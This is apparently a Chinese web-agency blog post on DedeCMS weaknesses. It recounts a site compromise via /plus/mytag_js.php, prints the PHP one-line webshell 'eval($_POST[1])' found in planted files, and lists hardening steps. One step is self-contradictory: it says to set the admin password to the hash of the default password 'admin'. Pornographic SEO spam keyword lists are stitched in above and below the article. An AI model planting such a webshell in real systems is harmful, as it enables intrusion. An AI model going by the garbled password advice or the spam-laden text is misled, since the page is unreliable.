国产视频在线观看一区I97人人艹I久久福利电影I久久综合视频网I国产在线观看99I亚州人成在线播放I91亚洲精品久久久

首頁 > 新聞 > 知識賦能

談Dedecms一些隱患以及如何預防風險

2017-11-30 6312
分享至:

 dedecms一直是很火的建站cms,主要得益于兩大站長網的鼎力支持;不過,人火是非多,cms太火了同樣會被別有用心的人盯上。我的網站一直在使用dedecms,前段時間又一次受到攻擊,攻擊的目的很簡單,那么便是黑鏈,知道后稍微修改下代碼就恢復了,不是很嚴重;這段時間網站又被莫名上傳文件,類似前一次,雖然對方還沒來得及修改網站模板,不過這說明網站安全防患還未到位,對方任何時候都可能再次取得管理員權限,所以要特別注意網站的安全防患措施。

  因為我比較喜歡尋根究底,所以就去網上找了一下相關的資料,發現這確實是dedecms的漏洞,黑客可以利用多維的變量繞過正則檢測,漏洞主要發生在/plus/mytag_js.php中,原理便是準備一個MySQL數據庫來攻擊已知網站的數據庫,通過向數據庫中寫入一句話的代碼,只要成功寫入,那么以后便可以利用這些代碼來獲得后臺管理員權限。

  結合我的網站被攻擊已經別人類似的經歷來看,黑客寫入的文件主要存在于/plus/文件夾下,目前已知的幾個文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,內容很少,可能寫入的時候不是很方便,不過這些代碼的作用確實不小的。

  下面這是ga.php文件中的部分代碼:

 

no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>

  實際的代碼比上面截取的要長,不過都是這段代碼的重復,至于log.php的代碼,同這個類似,只有一句話,簡單明了,如果你對網絡安全稍有了解,那么會知道是php一句話木馬,使用部分指定的工具可以執行這段代碼,預計是破解密碼的功能。

  既然已經知道對方是利用什么樣的漏洞,同時知道對方利用什么樣的原理來利用漏洞,那么要怎么預防這些危險的事發生呢?經過查詢大量的資料,我初步整理出下面這些預防漏洞被利用的步驟,希望對同樣適用dedecms的站長朋友們有所幫助。

  一、升級版本打好補丁設置目錄權限

  這是官方對此的解決辦法,不管你使用的是什么版本的dedecms,都要及時在后臺升級版本自動更新補丁,這是避免漏洞被利用的最重要的一步;同時官方還提供設置目錄的方法,主要是設置data、templets、uploads、a為可讀寫不可執行權限;include、member、plus、后臺管理目錄等設置為可執行可讀不可寫入權限;刪除install及special目錄,具體如何設置見官方說明。

  二、修改admin賬號及密碼

  黑客可能是利用默認admin賬號,隨后推測密碼來破解的,所以修改默認的admin賬號非常重要,至于如何修改,方法很多,比較有效的是用phpadmin登陸網站數據庫,找到dede_admin數據庫表(dede是數據庫表前綴),修改其中userid及pwd兩項,其中密碼一定要修改成f297a57a5a743894a0e4,這是默認的密碼admin;修改后去后臺登陸,登陸dede后臺后修改密碼。

  三、別的值得注意的地方

  至于更多的細節,同樣要注意,盡量別選擇太廉價的空間,太廉價的空間很容易出現服務器本身的安全問題,只要服務器出現問題,整個服務器下面的網站都沒救了。還有便是,如果沒必要,盡量別開通會員注冊什么的,使用起來很麻煩;至于網站后臺目錄,不要寫到robots.txt里面,同時每個月至少換一次,管理員密碼什么的同樣要更換,避免和別的賬號密碼相同被推測出來。

  經過這幾次網站被攻擊的實例,不得不說,互聯網不是一個可以安心睡大覺的網,作為站長,算是織網的人,更應該注重網絡安全;只要按照要求去做到了這些防范措施,不說100%,至少95%的可能不會被順利取得后臺權限。

來源聲明:

本文章系尚品中國編輯原創或采編整理,如需轉載請注明來自尚品中國。以上內容部分(包含圖片、文字)來源于網絡,如有侵權,請及時與本站聯系(010-60259772)。

立即預約專屬顧問 開啟數字化轉型之旅!

10年+資深項目經理1V1服務 | 行業定制化方案 | 精準報價體系
獲取策劃方案
立即預約專屬顧問 開啟數字化轉型之旅!

咨詢我們,獲得專業的服務和報價

聯系我們,免費獲取項目方案及報價,或只是聊一聊您的項目? 在收到您的需求留言后我們將由專業人員于24小時內與您取得聯系,請您保持電話暢通!

  • 科研院所解決方案
  • 外貿出海解決方案
  • 協會學會解決方案
  • 集團上市公司解決方案
  • 生物醫藥解決方案
  • 制造業解決方案
  • 高校教育解決方案
  • 信創網站改造解決方案
更多服務咨詢,請聯系尚品

010-60259772

您的姓名 *
您的電話 *
您的郵箱
公司名稱 *
主站蜘蛛池模板: 97久久精品一区二区三区观看 | 男女猛烈无遮挡免费视频 | 午夜黄色影院 | 夜本色| 亚洲国产精品热久久 | 日韩精品区 | www.91p| 国产在线拍揄自揄拍无码 | 在线a亚洲视频播放在线观看 | 黑色丝袜三级在线播放 | 香蕉久久夜色精品国产小优 | 国产亚洲综合成人91精品 | 人妻体体内射精一区二区 | 男女视频在线观看免费 | 99久久久精品 | 日韩免费一区二区 | 日韩毛片大全免费高清 | 日本免费在线视频 | 手机福利视频 | 毛片一级片 | 国产成人一区二区三区 | 成人看片| 少妇又紧又色又爽又刺激视频 | 色偷偷精品视频在线播放放 | 人妻换着玩又刺激又爽 | 无码人妻一区二区三区兔费 | 日韩成人大屁股内射喷水 | 久久免费午夜福利院 | 日韩免费大片 | 久久精品a一级国产免视看成人 | 欧美老妇牲交videos | 欧美日韩亚洲国产 | 免费日本视频 | 国产真实乱freesex | 日本高清免费zzzzzzzz | 国产精品国产三级国产av主播 | 一二三区免费视频 | 男人的天堂久久 | 久久久欧美综合久久久久 | 無码一区中文字幕少妇熟女H | 成人性生交大片免费看r老牛网站 | 欧美色哟哟 | 国产成人无码免费看片软件 | 99精彩视频 | 日韩成人无码影院 | 337p日本欧洲亚洲大胆张筱雨 | 精品国产精品国产偷麻豆 | 欧美一级www片免费观看 | 99久久99九九99九九九 | 天天拍拍夜夜出水 | 97色偷偷色噜噜狠狠爱网站 | 亚洲精品久久久久一区二区三区 | 福利视频在线观看www. | 久久99精品久久久久久国产越南 | 亚州av综合色区无码一区 | 国产亚州精品女人久久久久久 | 激情综合网五月 | 曰批全过程40分钟免费视频多人 | 免费无遮挡无码永久在线观看视频 | 日本熟妇色xxxxx日本免费看 | 亚洲成人av | 亚洲激情第二页 | 五月婷婷导航 | 色噜噜狠狠狠狠色综合久 | 精品偷拍被偷拍在线观看 | 欧美性黑人极品 hd 无码一区二区三区曰本A片 | 国产一起色一起爱 | 黄色的视频免费观看 | 久久久久国产成人精品亚洲午夜 | 一级毛片国产真人永久在线 | 欧美激情第1页 | 精品午夜寂寞黄网站在线 | 日韩乱视频 | 国产视频成人 | 黑人巨大videosjapan高清 婷婷在线免费观看 | 天天色天天干天天 | 亚洲日本高清成人aⅴ片 | 亚洲欧美日韩一级特黄在线 | 日本黄色视屏 | 日韩伦理一区二区三区 | 曰本无码人妻丰满熟妇啪啪 | 51国产偷自视频区视频 | 国产超碰人人模人人爽人人添 | 亚洲午夜无码毛片av久久京东热 | av在线播放国产 | 日韩久久精品电影 | av午夜电影 | av一区二区三区在线观看 | 91精品国产一区二区三区蜜臀 | 中文字幕一区在线观看视频 | 综合久久久久 | 精品久久久久久久人人人人传媒 | 亚洲第一页在线视频 | 日本高清免费在线视频 | 激情内射亚洲一区二区三区 | 日日操天天操夜夜操 | 亚洲精品久久久久成人2007 | 国产精品v在线播放观看 | 天天操天天干天天操 |